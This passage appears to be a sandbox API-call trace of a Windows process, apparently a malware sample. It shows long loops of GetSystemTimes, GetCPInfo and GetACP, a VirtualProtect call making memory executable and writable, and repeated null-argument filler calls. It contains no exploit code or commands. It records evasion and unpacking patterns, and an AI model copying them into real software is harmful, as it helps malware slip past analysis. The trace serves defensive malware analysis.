lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.147] GetACP () returned 0x4e4 [0083.147] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.147] GetACP () returned 0x4e4 [0083.147] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.147] GetACP () returned 0x4e4 [0083.147] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.148] GetACP () returned 0x4e4 [0083.148] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.148] GetACP () returned 0x4e4 [0083.148] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.148] GetACP () returned 0x4e4 [0083.148] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.148] GetACP () returned 0x4e4 [0083.148] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.149] GetACP () returned 0x4e4 [0083.149] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.149] GetACP () returned 0x4e4 [0083.149] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.149] GetACP () returned 0x4e4 [0083.149] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.149] GetACP () returned 0x4e4 [0083.150] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.150] GetACP () returned 0x4e4 [0083.150] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.150] GetACP () returned 0x4e4 [0083.150] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.150] GetACP () returned 0x4e4 [0083.150] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.150] GetACP () returned 0x4e4 [0083.151] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.151] GetACP () returned 0x4e4 [0083.151] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.151] GetACP () returned 0x4e4 [0083.151] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.151] GetACP () returned 0x4e4 [0083.151] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.151] GetACP () returned 0x4e4 [0083.152] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.152] GetACP () returned 0x4e4 [0083.152] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.152] GetACP () returned 0x4e4 [0083.152] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.152] GetACP () returned 0x4e4 [0083.152] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.152] GetACP () returned 0x4e4 [0083.152] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.153] GetACP () returned 0x4e4 [0083.153] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.153] GetACP () returned 0x4e4 [0083.153] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.153] GetACP () returned 0x4e4 [0083.153] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.153] GetACP () returned 0x4e4 [0083.154] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.154] GetACP () returned 0x4e4 [0083.154] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.154] GetACP () returned 0x4e4 [0083.154] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.154] GetACP () returned 0x4e4 [0083.154] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.155] GetACP () returned 0x4e4 [0083.155] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.155] GetACP () returned 0x4e4 [0083.155] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.155] GetACP () returned 0x4e4 [0083.155] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.155] GetACP () returned 0x4e4 [0083.155] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.156] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.156] GetACP () returned 0x4e4 [0083.156] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.156] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.156] GetACP () returned 0x4e4 [0083.156] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.156] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.156] GetACP () returned 0x4e4 [0083.156] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.157] GetACP () returned 0x4e4 [0083.157] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.157] GetACP () returned 0x4e4 [0083.157] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.157] GetACP () returned 0x4e4 [0083.157] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.158] GetACP () returned 0x4e4 [0083.158] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.158] GetACP () returned 0x4e4 [0083.158] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.158] GetACP () returned 0x4e4 [0083.158] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.158] GetACP () returned 0x4e4 [0083.158] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.159] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.159] GetACP () returned 0x4e4 [0083.517] VirtualProtect (in: lpAddress=0x5c5ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0083.517] AddAtomA (lpString=0x0) returned 0x0 [0083.517] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.518] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.518] AddAtomA (lpString=0x0) returned 0x0 [0083.518] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.518] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.518] AddAtomA (lpString=0x0) returned 0x0 [0083.518] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.518] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.518] AddAtomA (lpString=0x0) returned 0x0 [0083.518] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.518] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.518] AddAtomA (lpString=0x0) returned 0x0 [0083.518] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.518] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.518] AddAtomA (lpString=0x0) returned 0x0 [0083.519] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.519] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.519] AddAtomA (lpString=0x0) returned 0x0 [0083.519] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.519] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.519] AddAtomA (lpString=0x0) returned 0x0 [0083.519] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.519] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.519] AddAtomA (lpString=0x0) returned 0x0 [0083.519] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.519] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.519] AddAtomA (lpString=0x0) returned 0x0 [0083.519] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.520] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.520] AddAtomA (lpString=0x0) returned 0x0 [0083.520] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.520] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.520] AddAtomA (lpString=0x0) returned 0x0 [0083.520] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.520] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.520] AddAtomA (lpString=0x0) returned 0x0 [0083.520] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.520] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.520] AddAtomA (lpString=0x0) returned 0x0 [0083.520] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.520] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.521] AddAtomA (lpString=0x0) returned 0x0 [0083.521] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.521] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.521] AddAtomA (lpString=0x0) returned 0x0 [0083.521] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.521] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.521] AddAtomA (lpString=0x0) returned 0x0 [0083.521] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.521] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.521] AddAtomA (lpString=0x0) returned 0x0 [0083.521] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.521] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.521] AddAtomA (lpString=0x0) returned 0x0 [0083.521] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.521] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.521] AddAtomA (lpString=0x0) returned 0x0 [0083.521] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.521] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.521] AddAtomA (lpString=0x0) returned 0x0 [0083.521] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.522] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.522] AddAtomA (lpString=0x0) returned 0x0 [0083.522] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.522] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.522] AddAtomA (lpString=0x0) returned 0x0 [0083.522] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.522] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.522] AddAtomA (lpString=0x0) returned 0x0 [0083.522] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.522] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.522] AddAtomA (lpString=0x0) returned 0x0 [0083.522] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.522] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.522] AddAtomA (lpString=0x0) returned 0x0 [0083.522] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.522] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.522] AddAtomA (lpString=0x0) returned 0x0 [0083.522] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.522] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.522] AddAtomA (lpString=0x0) returned 0x0 [0083.522] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.522] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.522] AddAtomA (lpString=0x0) returned 0x0 [0083.522] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.523] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.523] AddAtomA (lpString=0x0) returned 0x0 [0083.523] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0083.524] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0083.524] AddAtomA (lpString=0x0) returned 0x0 [0083.524] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 